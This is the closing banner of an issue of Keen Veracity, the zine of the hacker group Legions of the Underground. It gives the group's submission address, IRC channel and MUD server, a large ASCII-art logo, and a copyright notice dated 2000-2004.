equal opportunity destroyer (of systems and great walls alike).
--------------------------------------------------------------------------------
All submissions to: submit-kv@legions.org
--------------------------------------------------------------------------------
IRC: Undernet #legions
MUD: Sensenet.legions.org 5555 - The Best in Star Wars Reality Mudding
--------------------------------------------------------------------------------
O F T E N I M I T A T E D N E V E R D U P L I C A T E D
--------------------------------------------------------------------------------
L E G I O N S O F T H E U N D E R G R O U N D
n :.
E% ___ _______ ___ ___ :"5
z % | | (_______) | | | | :" `
K ": | | | | | | | | | | z R
? %. | | | | | | | | | | :^ J
". ^s | |___ | |___| | | |___| | f :~
'+. #L |_____|[] \_____/[] \_____/[] z" .*
'+ %L z" .~
": '%. .# +
": ^%. .#` +"
#: "n .+` .z"
#: ": www.legions.org z` +"
%: `*L z" z"
*: ^*L z* .+"
"s ^*L z# .*"
#s ^%L z# .*"
#s ^%L z# .r"
#s ^%. u# .r"
#i '%. u# .@"
#s ^%u# .@"
#s x# .*"
x#` .@%.
x#` .d" "%.
xf~ .r" #s "%.
u x*` .r" #s "%. x.
%Mu*` x*" #m. "%zX"
:R(h x* "h..*dN.
u@NM5e#> 7?dMRMh.
z$@M@$#"#" *""*@MM$hL
u@@MM8* "*$M@Mh.
z$RRM8F" [knowledge is key] "N8@M$bL
5`RM$# 'R88f)R
'h.$" #$x*
--------------------------------------------------------------------------------
All mention of LoU, Legions of the Underground, Legions, KV, or Keen Veracity,
copyright (c) 2000-2004 legions.org, all human rights reserved outside the US.
--------------------------------------------------------------------------------